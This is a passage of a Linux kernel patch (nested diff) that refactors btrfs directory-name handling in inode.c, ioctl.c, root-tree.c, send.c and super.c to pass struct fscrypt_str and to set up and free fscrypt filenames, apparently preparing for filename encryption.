+ 	 */
+ 	if (btrfs_ino(inode) == BTRFS_EMPTY_SUBVOL_DIR_OBJECTID) {
+-		di = btrfs_search_dir_index_item(root, path, dir_ino,
+-						 name, name_len);
++		di = btrfs_search_dir_index_item(root, path, dir_ino, &fname.disk_name);
+ 		if (IS_ERR_OR_NULL(di)) {
+ 			if (!di)
+ 				ret = -ENOENT;
+@@ -4518,7 +4532,7 @@ static int btrfs_unlink_subvol(struct btrfs_trans_handle *trans,
+ 	} else {
+ 		ret = btrfs_del_root_ref(trans, objectid,
+ 					 root->root_key.objectid, dir_ino,
+-					 &index, name, name_len);
++					 &index, &fname.disk_name);
+ 		if (ret) {
+ 			btrfs_abort_transaction(trans, ret);
+ 			goto out;
+@@ -4531,7 +4545,7 @@ static int btrfs_unlink_subvol(struct btrfs_trans_handle *trans,
+ 		goto out;
+ 	}
+ 
+-	btrfs_i_size_write(BTRFS_I(dir), dir->i_size - name_len * 2);
++	btrfs_i_size_write(BTRFS_I(dir), dir->i_size - fname.disk_name.len * 2);
+ 	inode_inc_iversion(dir);
+ 	dir->i_mtime = current_time(dir);
+ 	dir->i_ctime = dir->i_mtime;
+@@ -4540,6 +4554,7 @@ static int btrfs_unlink_subvol(struct btrfs_trans_handle *trans,
+ 		btrfs_abort_transaction(trans, ret);
+ out:
+ 	btrfs_free_path(path);
++	fscrypt_free_filename(&fname);
+ 	return ret;
+ }
+ 
+@@ -4553,6 +4568,7 @@ static noinline int may_destroy_subvol(struct btrfs_root *root)
+ 	struct btrfs_path *path;
+ 	struct btrfs_dir_item *di;
+ 	struct btrfs_key key;
++	struct fscrypt_str name = FSTR_INIT("default", 7);
+ 	u64 dir_id;
+ 	int ret;
+ 
+@@ -4563,7 +4579,7 @@ static noinline int may_destroy_subvol(struct btrfs_root *root)
+ 	/* Make sure this root isn't set as the default subvol */
+ 	dir_id = btrfs_super_root_dir(fs_info->super_copy);
+ 	di = btrfs_lookup_dir_item(NULL, fs_info->tree_root, path,
+-				   dir_id, "default", 7, 0);
++				   dir_id, &name, 0);
+ 	if (di && !IS_ERR(di)) {
+ 		btrfs_dir_item_key_to_cpu(path->nodes[0], di, &key);
+ 		if (key.objectid == root->root_key.objectid) {
+@@ -4802,6 +4818,7 @@ static int btrfs_rmdir(struct inode *dir, struct dentry *dentry)
+ 	int err = 0;
+ 	struct btrfs_trans_handle *trans;
+ 	u64 last_unlink_trans;
++	struct fscrypt_name fname;
+ 
+ 	if (inode->i_size > BTRFS_EMPTY_DIR_SIZE)
+ 		return -ENOTEMPTY;
+@@ -4814,9 +4831,17 @@ static int btrfs_rmdir(struct inode *dir, struct dentry *dentry)
+ 		return btrfs_delete_subvolume(dir, dentry);
+ 	}
+ 
++	err = fscrypt_setup_filename(dir, &dentry->d_name, 1, &fname);
++	if (err)
++		return err;
++
++	/* This needs to handle no-key deletions later on */
++
+ 	trans = __unlink_start_trans(dir);
+-	if (IS_ERR(trans))
+-		return PTR_ERR(trans);
++	if (IS_ERR(trans)) {
++		err = PTR_ERR(trans);
++		goto out_notrans;
++	}
+ 
+ 	if (unlikely(btrfs_ino(BTRFS_I(inode)) == BTRFS_EMPTY_SUBVOL_DIR_OBJECTID)) {
+ 		err = btrfs_unlink_subvol(trans, dir, dentry);
+@@ -4830,9 +4855,8 @@ static int btrfs_rmdir(struct inode *dir, struct dentry *dentry)
+ 	last_unlink_trans = BTRFS_I(inode)->last_unlink_trans;
+ 
+ 	/* now the directory is empty */
+-	err = btrfs_unlink_inode(trans, BTRFS_I(dir),
+-			BTRFS_I(d_inode(dentry)), dentry->d_name.name,
+-			dentry->d_name.len);
++	err = btrfs_unlink_inode(trans, BTRFS_I(dir), BTRFS_I(d_inode(dentry)),
++				 &fname.disk_name);
+ 	if (!err) {
+ 		btrfs_i_size_write(BTRFS_I(inode), 0);
+ 		/*
+@@ -4851,7 +4875,9 @@ static int btrfs_rmdir(struct inode *dir, struct dentry *dentry)
+ 	}
+ out:
+ 	btrfs_end_transaction(trans);
++out_notrans:
+ 	btrfs_btree_balance_dirty(fs_info);
++	fscrypt_free_filename(&fname);
+ 
+ 	return err;
+ }
+@@ -5532,19 +5558,24 @@ no_delete:
+ static int btrfs_inode_by_name(struct inode *dir, struct dentry *dentry,
+ 			       struct btrfs_key *location, u8 *type)
+ {
+-	const char *name = dentry->d_name.name;
+-	int namelen = dentry->d_name.len;
+ 	struct btrfs_dir_item *di;
+ 	struct btrfs_path *path;
+ 	struct btrfs_root *root = BTRFS_I(dir)->root;
+ 	int ret = 0;
++	struct fscrypt_name fname;
+ 
+ 	path = btrfs_alloc_path();
+ 	if (!path)
+ 		return -ENOMEM;
+ 
++	ret = fscrypt_setup_filename(dir, &dentry->d_name, 1, &fname);
++	if (ret)
++		goto out;
++
++	/* This needs to handle no-key deletions later on */
++
+ 	di = btrfs_lookup_dir_item(NULL, root, path, btrfs_ino(BTRFS_I(dir)),
+-			name, namelen, 0);
++				   &fname.disk_name, 0);
+ 	if (IS_ERR_OR_NULL(di)) {
+ 		ret = di ? PTR_ERR(di) : -ENOENT;
+ 		goto out;
+@@ -5556,12 +5587,13 @@ static int btrfs_inode_by_name(struct inode *dir, struct dentry *dentry,
+ 		ret = -EUCLEAN;
+ 		btrfs_warn(root->fs_info,
+ "%s gets something invalid in DIR_ITEM (name %s, directory ino %llu, location(%llu %u %llu))",
+-			   __func__, name, btrfs_ino(BTRFS_I(dir)),
++			   __func__, fname.disk_name.name, btrfs_ino(BTRFS_I(dir)),
+ 			   location->objectid, location->type, location->offset);
+ 	}
+ 	if (!ret)
+ 		*type = btrfs_dir_type(path->nodes[0], di);
+ out:
++	fscrypt_free_filename(&fname);
+ 	btrfs_free_path(path);
+ 	return ret;
+ }
+@@ -5584,6 +5616,11 @@ static int fixup_tree_root_location(struct btrfs_fs_info *fs_info,
+ 	struct btrfs_key key;
+ 	int ret;
+ 	int err = 0;
++	struct fscrypt_name fname;
++
++	ret = fscrypt_setup_filename(dir, &dentry->d_name, 0, &fname);
++	if (ret)
++		return ret;
+ 
+ 	path = btrfs_alloc_path();
+ 	if (!path) {
+@@ -5606,12 +5643,11 @@ static int fixup_tree_root_location(struct btrfs_fs_info *fs_info,
+ 	leaf = path->nodes[0];
+ 	ref = btrfs_item_ptr(leaf, path->slots[0], struct btrfs_root_ref);
+ 	if (btrfs_root_ref_dirid(leaf, ref) != btrfs_ino(BTRFS_I(dir)) ||
+-	    btrfs_root_ref_name_len(leaf, ref) != dentry->d_name.len)
++	    btrfs_root_ref_name_len(leaf, ref) != fname.disk_name.len)
+ 		goto out;
+ 
+-	ret = memcmp_extent_buffer(leaf, dentry->d_name.name,
+-				   (unsigned long)(ref + 1),
+-				   dentry->d_name.len);
++	ret = memcmp_extent_buffer(leaf, fname.disk_name.name,
++				   (unsigned long)(ref + 1), fname.disk_name.len);
+ 	if (ret)
+ 		goto out;
+ 
+@@ -5630,6 +5666,7 @@ static int fixup_tree_root_location(struct btrfs_fs_info *fs_info,
+ 	err = 0;
+ out:
+ 	btrfs_free_path(path);
++	fscrypt_free_filename(&fname);
+ 	return err;
+ }
+ 
+@@ -6238,9 +6275,18 @@ int btrfs_new_inode_prepare(struct btrfs_new_inode_args *args,
+ 	struct inode *inode = args->inode;
+ 	int ret;
+ 
++	if (!args->orphan) {
++		ret = fscrypt_setup_filename(dir, &args->dentry->d_name, 0,
++					     &args->fname);
++		if (ret)
++			return ret;
++	}
++
+ 	ret = posix_acl_create(dir, &inode->i_mode, &args->default_acl, &args->acl);
+-	if (ret)
++	if (ret) {
++		fscrypt_free_filename(&args->fname);
+ 		return ret;
++	}
+ 
+ 	/* 1 to add inode item */
+ 	*trans_num_items = 1;
+@@ -6280,6 +6326,7 @@ void btrfs_new_inode_args_destroy(struct btrfs_new_inode_args *args)
+ {
+ 	posix_acl_release(args->acl);
+ 	posix_acl_release(args->default_acl);
++	fscrypt_free_filename(&args->fname);
+ }
+ 
+ /*
+@@ -6315,8 +6362,7 @@ int btrfs_create_new_inode(struct btrfs_trans_handle *trans,
+ {
+ 	struct inode *dir = args->dir;
+ 	struct inode *inode = args->inode;
+-	const char *name = args->orphan ? NULL : args->dentry->d_name.name;
+-	int name_len = args->orphan ? 0 : args->dentry->d_name.len;
++	const struct fscrypt_str *name = args->orphan ? NULL : &args->fname.disk_name;
+ 	struct btrfs_fs_info *fs_info = btrfs_sb(dir->i_sb);
+ 	struct btrfs_root *root;
+ 	struct btrfs_inode_item *inode_item;
+@@ -6417,7 +6463,7 @@ int btrfs_create_new_inode(struct btrfs_trans_handle *trans,
+ 			sizes[1] = 2 + sizeof(*ref);
+ 		} else {
+ 			key[1].offset = btrfs_ino(BTRFS_I(dir));
+-			sizes[1] = name_len + sizeof(*ref);
++			sizes[1] = name->len + sizeof(*ref);
+ 		}
+ 	}
+ 
+@@ -6456,10 +6502,12 @@ int btrfs_create_new_inode(struct btrfs_trans_handle *trans,
+ 			btrfs_set_inode_ref_index(path->nodes[0], ref, 0);
+ 			write_extent_buffer(path->nodes[0], "..", ptr, 2);
+ 		} else {
+-			btrfs_set_inode_ref_name_len(path->nodes[0], ref, name_len);
++			btrfs_set_inode_ref_name_len(path->nodes[0], ref,
++						     name->len);
+ 			btrfs_set_inode_ref_index(path->nodes[0], ref,
+ 						  BTRFS_I(inode)->dir_index);
+-			write_extent_buffer(path->nodes[0], name, ptr, name_len);
++			write_extent_buffer(path->nodes[0], name->name, ptr,
++					    name->len);
+ 		}
+ 	}
+ 
+@@ -6520,7 +6568,7 @@ int btrfs_create_new_inode(struct btrfs_trans_handle *trans,
+ 		ret = btrfs_orphan_add(trans, BTRFS_I(inode));
+ 	} else {
+ 		ret = btrfs_add_link(trans, BTRFS_I(dir), BTRFS_I(inode), name,
+-				     name_len, 0, BTRFS_I(inode)->dir_index);
++				     0, BTRFS_I(inode)->dir_index);
+ 	}
+ 	if (ret) {
+ 		btrfs_abort_transaction(trans, ret);
+@@ -6549,7 +6597,7 @@ out:
+  */
+ int btrfs_add_link(struct btrfs_trans_handle *trans,
+ 		   struct btrfs_inode *parent_inode, struct btrfs_inode *inode,
+-		   const char *name, int name_len, int add_backref, u64 index)
++		   const struct fscrypt_str *name, int add_backref, u64 index)
+ {
+ 	int ret = 0;
+ 	struct btrfs_key key;
+@@ -6568,17 +6616,17 @@ int btrfs_add_link(struct btrfs_trans_handle *trans,
+ 	if (unlikely(ino == BTRFS_FIRST_FREE_OBJECTID)) {
+ 		ret = btrfs_add_root_ref(trans, key.objectid,
+ 					 root->root_key.objectid, parent_ino,
+-					 index, name, name_len);
++					 index, name);
+ 	} else if (add_backref) {
+-		ret = btrfs_insert_inode_ref(trans, root, name, name_len, ino,
+-					     parent_ino, index);
++		ret = btrfs_insert_inode_ref(trans, root, name,
++					     ino, parent_ino, index);
+ 	}
+ 
+ 	/* Nothing to clean up yet */
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = btrfs_insert_dir_item(trans, name, name_len, parent_inode, &key,
++	ret = btrfs_insert_dir_item(trans, name, parent_inode, &key,
+ 				    btrfs_inode_type(&inode->vfs_inode), index);
+ 	if (ret == -EEXIST || ret == -EOVERFLOW)
+ 		goto fail_dir_item;
+@@ -6588,7 +6636,7 @@ int btrfs_add_link(struct btrfs_trans_handle *trans,
+ 	}
+ 
+ 	btrfs_i_size_write(parent_inode, parent_inode->vfs_inode.i_size +
+-			   name_len * 2);
++			   name->len * 2);
+ 	inode_inc_iversion(&parent_inode->vfs_inode);
+ 	/*
+ 	 * If we are replaying a log tree, we do not want to update the mtime
+@@ -6613,15 +6661,15 @@ fail_dir_item:
+ 		int err;
+ 		err = btrfs_del_root_ref(trans, key.objectid,
+ 					 root->root_key.objectid, parent_ino,
+-					 &local_index, name, name_len);
++					 &local_index, name);
+ 		if (err)
+ 			btrfs_abort_transaction(trans, err);
+ 	} else if (add_backref) {
+ 		u64 local_index;
+ 		int err;
+ 
+-		err = btrfs_del_inode_ref(trans, root, name, name_len,
+-					  ino, parent_ino, &local_index);
++		err = btrfs_del_inode_ref(trans, root, name, ino, parent_ino,
++					  &local_index);
+ 		if (err)
+ 			btrfs_abort_transaction(trans, err);
+ 	}
+@@ -6704,6 +6752,7 @@ static int btrfs_link(struct dentry *old_dentry, struct inode *dir,
+ 	struct btrfs_root *root = BTRFS_I(dir)->root;
+ 	struct inode *inode = d_inode(old_dentry);
+ 	struct btrfs_fs_info *fs_info = btrfs_sb(inode->i_sb);
++	struct fscrypt_name fname;
+ 	u64 index;
+ 	int err;
+ 	int drop_inode = 0;
+@@ -6715,6 +6764,10 @@ static int btrfs_link(struct dentry *old_dentry, struct inode *dir,
+ 	if (inode->i_nlink >= BTRFS_LINK_MAX)
+ 		return -EMLINK;
+ 
++	err = fscrypt_setup_filename(dir, &dentry->d_name, 0, &fname);
++	if (err)
++		goto fail;
++
+ 	err = btrfs_set_inode_index(BTRFS_I(dir), &index);
+ 	if (err)
+ 		goto fail;
+@@ -6741,7 +6794,7 @@ static int btrfs_link(struct dentry *old_dentry, struct inode *dir,
+ 	set_bit(BTRFS_INODE_COPY_EVERYTHING, &BTRFS_I(inode)->runtime_flags);
+ 
+ 	err = btrfs_add_link(trans, BTRFS_I(dir), BTRFS_I(inode),
+-			     dentry->d_name.name, dentry->d_name.len, 1, index);
++			     &fname.disk_name, 1, index);
+ 
+ 	if (err) {
+ 		drop_inode = 1;
+@@ -6765,6 +6818,7 @@ static int btrfs_link(struct dentry *old_dentry, struct inode *dir,
+ 	}
+ 
+ fail:
++	fscrypt_free_filename(&fname);
+ 	if (trans)
+ 		btrfs_end_transaction(trans);
+ 	if (drop_inode) {
+@@ -9037,6 +9091,8 @@ static int btrfs_rename_exchange(struct inode *old_dir,
+ 	int ret;
+ 	int ret2;
+ 	bool need_abort = false;
++	struct fscrypt_name old_fname, new_fname;
++	struct fscrypt_str *old_name, *new_name;
+ 
+ 	/*
+ 	 * For non-subvolumes allow exchange only within one subvolume, in the
+@@ -9048,6 +9104,19 @@ static int btrfs_rename_exchange(struct inode *old_dir,
+ 	     new_ino != BTRFS_FIRST_FREE_OBJECTID))
+ 		return -EXDEV;
+ 
++	ret = fscrypt_setup_filename(old_dir, &old_dentry->d_name, 0, &old_fname);
++	if (ret)
++		return ret;
++
++	ret = fscrypt_setup_filename(new_dir, &new_dentry->d_name, 0, &new_fname);
++	if (ret) {
++		fscrypt_free_filename(&old_fname);
++		return ret;
++	}
++
++	old_name = &old_fname.disk_name;
++	new_name = &new_fname.disk_name;
++
+ 	/* close the race window with snapshot create/destroy ioctl */
+ 	if (old_ino == BTRFS_FIRST_FREE_OBJECTID ||
+ 	    new_ino == BTRFS_FIRST_FREE_OBJECTID)
+@@ -9115,10 +9184,7 @@ static int btrfs_rename_exchange(struct inode *old_dir,
+ 		/* force full log commit if subvolume involved. */
+ 		btrfs_set_log_full_commit(trans);
+ 	} else {
+-		ret = btrfs_insert_inode_ref(trans, dest,
+-					     new_dentry->d_name.name,
+-					     new_dentry->d_name.len,
+-					     old_ino,
++		ret = btrfs_insert_inode_ref(trans, dest, new_name, old_ino,
+ 					     btrfs_ino(BTRFS_I(new_dir)),
+ 					     old_idx);
+ 		if (ret)
+@@ -9131,10 +9197,7 @@ static int btrfs_rename_exchange(struct inode *old_dir,
+ 		/* force full log commit if subvolume involved. */
+ 		btrfs_set_log_full_commit(trans);
+ 	} else {
+-		ret = btrfs_insert_inode_ref(trans, root,
+-					     old_dentry->d_name.name,
+-					     old_dentry->d_name.len,
+-					     new_ino,
++		ret = btrfs_insert_inode_ref(trans, root, old_name, new_ino,
+ 					     btrfs_ino(BTRFS_I(old_dir)),
+ 					     new_idx);
+ 		if (ret) {
+@@ -9169,9 +9232,7 @@ static int btrfs_rename_exchange(struct inode *old_dir,
+ 	} else { /* src is an inode */
+ 		ret = __btrfs_unlink_inode(trans, BTRFS_I(old_dir),
+ 					   BTRFS_I(old_dentry->d_inode),
+-					   old_dentry->d_name.name,
+-					   old_dentry->d_name.len,
+-					   &old_rename_ctx);
++					   old_name, &old_rename_ctx);
+ 		if (!ret)
+ 			ret = btrfs_update_inode(trans, root, BTRFS_I(old_inode));
+ 	}
+@@ -9186,9 +9247,7 @@ static int btrfs_rename_exchange(struct inode *old_dir,
+ 	} else { /* dest is an inode */
+ 		ret = __btrfs_unlink_inode(trans, BTRFS_I(new_dir),
+ 					   BTRFS_I(new_dentry->d_inode),
+-					   new_dentry->d_name.name,
+-					   new_dentry->d_name.len,
+-					   &new_rename_ctx);
++					   new_name, &new_rename_ctx);
+ 		if (!ret)
+ 			ret = btrfs_update_inode(trans, dest, BTRFS_I(new_inode));
+ 	}
+@@ -9198,16 +9257,14 @@ static int btrfs_rename_exchange(struct inode *old_dir,
+ 	}
+ 
+ 	ret = btrfs_add_link(trans, BTRFS_I(new_dir), BTRFS_I(old_inode),
+-			     new_dentry->d_name.name,
+-			     new_dentry->d_name.len, 0, old_idx);
++			     new_name, 0, old_idx);
+ 	if (ret) {
+ 		btrfs_abort_transaction(trans, ret);
+ 		goto out_fail;
+ 	}
+ 
+ 	ret = btrfs_add_link(trans, BTRFS_I(old_dir), BTRFS_I(new_inode),
+-			     old_dentry->d_name.name,
+-			     old_dentry->d_name.len, 0, new_idx);
++			     old_name, 0, new_idx);
+ 	if (ret) {
+ 		btrfs_abort_transaction(trans, ret);
+ 		goto out_fail;
+@@ -9250,6 +9307,8 @@ out_notrans:
+ 	    old_ino == BTRFS_FIRST_FREE_OBJECTID)
+ 		up_read(&fs_info->subvol_sem);
+ 
++	fscrypt_free_filename(&new_fname);
++	fscrypt_free_filename(&old_fname);
+ 	return ret;
+ }
+ 
+@@ -9289,6 +9348,7 @@ static int btrfs_rename(struct user_namespace *mnt_userns,
+ 	int ret;
+ 	int ret2;
+ 	u64 old_ino = btrfs_ino(BTRFS_I(old_inode));
++	struct fscrypt_name old_fname, new_fname;
+ 
+ 	if (btrfs_ino(BTRFS_I(new_dir)) == BTRFS_EMPTY_SUBVOL_DIR_OBJECTID)
+ 		return -EPERM;
+@@ -9305,22 +9365,28 @@ static int btrfs_rename(struct user_namespace *mnt_userns,
+ 	    new_inode->i_size > BTRFS_EMPTY_DIR_SIZE)
+ 		return -ENOTEMPTY;
+ 
++	ret = fscrypt_setup_filename(old_dir, &old_dentry->d_name, 0, &old_fname);
++	if (ret)
++		return ret;
+ 
+-	/* check for collisions, even if the  name isn't there */
+-	ret = btrfs_check_dir_item_collision(dest, new_dir->i_ino,
+-			     new_dentry->d_name.name,
+-			     new_dentry->d_name.len);
++	ret = fscrypt_setup_filename(new_dir, &new_dentry->d_name, 0, &new_fname);
++	if (ret) {
++		fscrypt_free_filename(&old_fname);
++		return ret;
++	}
+ 
++	/* check for collisions, even if the  name isn't there */
++	ret = btrfs_check_dir_item_collision(dest, new_dir->i_ino, &new_fname.disk_name);
+ 	if (ret) {
+ 		if (ret == -EEXIST) {
+ 			/* we shouldn't get
+ 			 * eexist without a new_inode */
+ 			if (WARN_ON(!new_inode)) {
+-				return ret;
++				goto out_fscrypt_names;
+ 			}
+ 		} else {
+ 			/* maybe -EOVERFLOW */
+-			return ret;
++			goto out_fscrypt_names;
+ 		}
+ 	}
+ 	ret = 0;
+@@ -9334,8 +9400,10 @@ static int btrfs_rename(struct user_namespace *mnt_userns,
+ 
+ 	if (flags & RENAME_WHITEOUT) {
+ 		whiteout_args.inode = new_whiteout_inode(mnt_userns, old_dir);
+-		if (!whiteout_args.inode)
+-			return -ENOMEM;
++		if (!whiteout_args.inode) {
++			ret = -ENOMEM;
++			goto out_fscrypt_names;
++		}
+ 		ret = btrfs_new_inode_prepare(&whiteout_args, &trans_num_items);
+ 		if (ret)
+ 			goto out_whiteout_inode;
+@@ -9403,11 +9471,9 @@ static int btrfs_rename(struct user_namespace *mnt_userns,
+ 		/* force full log commit if subvolume involved. */
+ 		btrfs_set_log_full_commit(trans);
+ 	} else {
+-		ret = btrfs_insert_inode_ref(trans, dest,
+-					     new_dentry->d_name.name,
+-					     new_dentry->d_name.len,
+-					     old_ino,
+-					     btrfs_ino(BTRFS_I(new_dir)), index);
++		ret = btrfs_insert_inode_ref(trans, dest, &new_fname.disk_name,
++					     old_ino, btrfs_ino(BTRFS_I(new_dir)),
++					     index);
+ 		if (ret)
+ 			goto out_fail;
+ 	}
+@@ -9429,10 +9495,8 @@ static int btrfs_rename(struct user_namespace *mnt_userns,
+ 		ret = btrfs_unlink_subvol(trans, old_dir, old_dentry);
+ 	} else {
+ 		ret = __btrfs_unlink_inode(trans, BTRFS_I(old_dir),
+-					BTRFS_I(d_inode(old_dentry)),
+-					old_dentry->d_name.name,
+-					old_dentry->d_name.len,
+-					&rename_ctx);
++					   BTRFS_I(d_inode(old_dentry)),
++					   &old_fname.disk_name, &rename_ctx);
+ 		if (!ret)
+ 			ret = btrfs_update_inode(trans, root, BTRFS_I(old_inode));
+ 	}
+@@ -9451,8 +9515,7 @@ static int btrfs_rename(struct user_namespace *mnt_userns,
+ 		} else {
+ 			ret = btrfs_unlink_inode(trans, BTRFS_I(new_dir),
+ 						 BTRFS_I(d_inode(new_dentry)),
+-						 new_dentry->d_name.name,
+-						 new_dentry->d_name.len);
++						 &new_fname.disk_name);
+ 		}
+ 		if (!ret && new_inode->i_nlink == 0)
+ 			ret = btrfs_orphan_add(trans,
+@@ -9464,8 +9527,7 @@ static int btrfs_rename(struct user_namespace *mnt_userns,
+ 	}
+ 
+ 	ret = btrfs_add_link(trans, BTRFS_I(new_dir), BTRFS_I(old_inode),
+-			     new_dentry->d_name.name,
+-			     new_dentry->d_name.len, 0, index);
++			     &new_fname.disk_name, 0, index);
+ 	if (ret) {
+ 		btrfs_abort_transaction(trans, ret);
+ 		goto out_fail;
+@@ -9500,6 +9562,9 @@ out_notrans:
+ out_whiteout_inode:
+ 	if (flags & RENAME_WHITEOUT)
+ 		iput(whiteout_args.inode);
++out_fscrypt_names:
++	fscrypt_free_filename(&old_fname);
++	fscrypt_free_filename(&new_fname);
+ 	return ret;
+ }
+ 
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index 2e29fafe0e7d9..9e323420c96d3 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -951,6 +951,7 @@ static noinline int btrfs_mksubvol(const struct path *parent,
+ 	struct inode *dir = d_inode(parent->dentry);
+ 	struct btrfs_fs_info *fs_info = btrfs_sb(dir->i_sb);
+ 	struct dentry *dentry;
++	struct fscrypt_str name_str = FSTR_INIT((char *)name, namelen);
+ 	int error;
+ 
+ 	error = down_write_killable_nested(&dir->i_rwsem, I_MUTEX_PARENT);
+@@ -971,8 +972,7 @@ static noinline int btrfs_mksubvol(const struct path *parent,
+ 	 * check for them now when we can safely fail
+ 	 */
+ 	error = btrfs_check_dir_item_collision(BTRFS_I(dir)->root,
+-					       dir->i_ino, name,
+-					       namelen);
++					       dir->i_ino, &name_str);
+ 	if (error)
+ 		goto out_dput;
+ 
+@@ -3782,6 +3782,7 @@ static long btrfs_ioctl_default_subvol(struct file *file, void __user *argp)
+ 	struct btrfs_trans_handle *trans;
+ 	struct btrfs_path *path = NULL;
+ 	struct btrfs_disk_key disk_key;
++	struct fscrypt_str name = FSTR_INIT("default", 7);
+ 	u64 objectid = 0;
+ 	u64 dir_id;
+ 	int ret;
+@@ -3825,7 +3826,7 @@ static long btrfs_ioctl_default_subvol(struct file *file, void __user *argp)
+ 
+ 	dir_id = btrfs_super_root_dir(fs_info->super_copy);
+ 	di = btrfs_lookup_dir_item(trans, fs_info->tree_root, path,
+-				   dir_id, "default", 7, 1);
++				   dir_id, &name, 1);
+ 	if (IS_ERR_OR_NULL(di)) {
+ 		btrfs_release_path(path);
+ 		btrfs_end_transaction(trans);
+diff --git a/fs/btrfs/root-tree.c b/fs/btrfs/root-tree.c
+index e1f599d7a9164..7d783f0943068 100644
+--- a/fs/btrfs/root-tree.c
++++ b/fs/btrfs/root-tree.c
+@@ -327,9 +327,8 @@ out:
+ }
+ 
+ int btrfs_del_root_ref(struct btrfs_trans_handle *trans, u64 root_id,
+-		       u64 ref_id, u64 dirid, u64 *sequence, const char *name,
+-		       int name_len)
+-
++		       u64 ref_id, u64 dirid, u64 *sequence,
++		       const struct fscrypt_str *name)
+ {
+ 	struct btrfs_root *tree_root = trans->fs_info->tree_root;
+ 	struct btrfs_path *path;
+@@ -356,8 +355,8 @@ again:
+ 				     struct btrfs_root_ref);
+ 		ptr = (unsigned long)(ref + 1);
+ 		if ((btrfs_root_ref_dirid(leaf, ref) != dirid) ||
+-		    (btrfs_root_ref_name_len(leaf, ref) != name_len) ||
+-		    memcmp_extent_buffer(leaf, name, ptr, name_len)) {
++		    (btrfs_root_ref_name_len(leaf, ref) != name->len) ||
++		    memcmp_extent_buffer(leaf, name->name, ptr, name->len)) {
+ 			ret = -ENOENT;
+ 			goto out;
+ 		}
+@@ -400,8 +399,8 @@ out:
+  * Will return 0, -ENOMEM, or anything from the CoW path
+  */
+ int btrfs_add_root_ref(struct btrfs_trans_handle *trans, u64 root_id,
+-		       u64 ref_id, u64 dirid, u64 sequence, const char *name,
+-		       int name_len)
++		       u64 ref_id, u64 dirid, u64 sequence,
++		       const struct fscrypt_str *name)
+ {
+ 	struct btrfs_root *tree_root = trans->fs_info->tree_root;
+ 	struct btrfs_key key;
+@@ -420,7 +419,7 @@ int btrfs_add_root_ref(struct btrfs_trans_handle *trans, u64 root_id,
+ 	key.offset = ref_id;
+ again:
+ 	ret = btrfs_insert_empty_item(trans, tree_root, path, &key,
+-				      sizeof(*ref) + name_len);
++				      sizeof(*ref) + name->len);
+ 	if (ret) {
+ 		btrfs_abort_transaction(trans, ret);
+ 		btrfs_free_path(path);
+@@ -431,9 +430,9 @@ again:
+ 	ref = btrfs_item_ptr(leaf, path->slots[0], struct btrfs_root_ref);
+ 	btrfs_set_root_ref_dirid(leaf, ref, dirid);
+ 	btrfs_set_root_ref_sequence(leaf, ref, sequence);
+-	btrfs_set_root_ref_name_len(leaf, ref, name_len);
++	btrfs_set_root_ref_name_len(leaf, ref, name->len);
+ 	ptr = (unsigned long)(ref + 1);
+-	write_extent_buffer(leaf, name, ptr, name_len);
++	write_extent_buffer(leaf, name->name, ptr, name->len);
+ 	btrfs_mark_buffer_dirty(leaf);
+ 
+ 	if (key.type == BTRFS_ROOT_BACKREF_KEY) {
+diff --git a/fs/btrfs/send.c b/fs/btrfs/send.c
+index 35e889fe2a95d..547b5c2292186 100644
+--- a/fs/btrfs/send.c
++++ b/fs/btrfs/send.c
+@@ -1596,13 +1596,17 @@ static int gen_unique_name(struct send_ctx *sctx,
+ 		return -ENOMEM;
+ 
+ 	while (1) {
++		struct fscrypt_str tmp_name;
++
+ 		len = snprintf(tmp, sizeof(tmp), "o%llu-%llu-%llu",
+ 				ino, gen, idx);
+ 		ASSERT(len < sizeof(tmp));
++		tmp_name.name = tmp;
++		tmp_name.len = strlen(tmp);
+ 
+ 		di = btrfs_lookup_dir_item(NULL, sctx->send_root,
+ 				path, BTRFS_FIRST_FREE_OBJECTID,
+-				tmp, strlen(tmp), 0);
++				&tmp_name, 0);
+ 		btrfs_release_path(path);
+ 		if (IS_ERR(di)) {
+ 			ret = PTR_ERR(di);
+@@ -1622,7 +1626,7 @@ static int gen_unique_name(struct send_ctx *sctx,
+ 
+ 		di = btrfs_lookup_dir_item(NULL, sctx->parent_root,
+ 				path, BTRFS_FIRST_FREE_OBJECTID,
+-				tmp, strlen(tmp), 0);
++				&tmp_name, 0);
+ 		btrfs_release_path(path);
+ 		if (IS_ERR(di)) {
+ 			ret = PTR_ERR(di);
+@@ -1752,13 +1756,13 @@ static int lookup_dir_item_inode(struct btrfs_root *root,
+ 	struct btrfs_dir_item *di;
+ 	struct btrfs_key key;
+ 	struct btrfs_path *path;
++	struct fscrypt_str name_str = FSTR_INIT((char *)name, name_len);
+ 
+ 	path = alloc_path_for_send();
+ 	if (!path)
+ 		return -ENOMEM;
+ 
+-	di = btrfs_lookup_dir_item(NULL, root, path,
+-			dir, name, name_len, 0);
++	di = btrfs_lookup_dir_item(NULL, root, path, dir, &name_str, 0);
+ 	if (IS_ERR_OR_NULL(di)) {
+ 		ret = di ? PTR_ERR(di) : -ENOENT;
+ 		goto out;
+diff --git a/fs/btrfs/super.c b/fs/btrfs/super.c
+index 582b71b7fa779..2c562febd801e 100644
+--- a/fs/btrfs/super.c
++++ b/fs/btrfs/super.c
+@@ -1398,6 +1398,7 @@ static int get_default_subvol_objectid(struct btrfs_fs_info *fs_info, u64 *objec
+ 	struct btrfs_dir_item *di;
+ 	struct btrfs_path *path;
+ 	struct btrfs_key location;
++	struct fscrypt_str name = FSTR_INIT("default", 7);
+ 	u64 dir_id;
+ 
+ 	path = btrfs_alloc_path();
+@@ -1410,7 +1411,7 @@ static int get_default_subvol_objectid(struct btrfs_fs_info *fs_info, u64 *objec
+ 	 * to mount.
+ 	 */
+ 	dir_id = btrfs_super_root_dir(fs_info->super_copy);
+-	di = btrfs_lookup_dir_item(NULL, root, path, dir_id, "default", 7, 0);
++	di = btrfs_lookup_dir_item(NULL, root, path, dir_id, &name, 0);
+ 	if (IS_ERR(di)) {
+ 		btrfs_free_path(path);
+ 		return PTR_ERR(di);
+diff --git a/fs/btrfs/transaction.c b/fs/btrfs/transaction.c
+index a555567594418..1193214ba8c10 100644
+--- a/fs/btrfs/transaction.c
++++ b/fs/btrfs/transaction.c
+@@ -6,6 +6,7 @@
+ #include <linux/fs.h>
+ #include <linux/slab.h>
+ #include <linux/sched.h>
++#include <linux/sched/mm.h>
+ #include <linux/writeback.h>
+ #include <linux/pagemap.h>
+ #include <linux/blkdev.h>
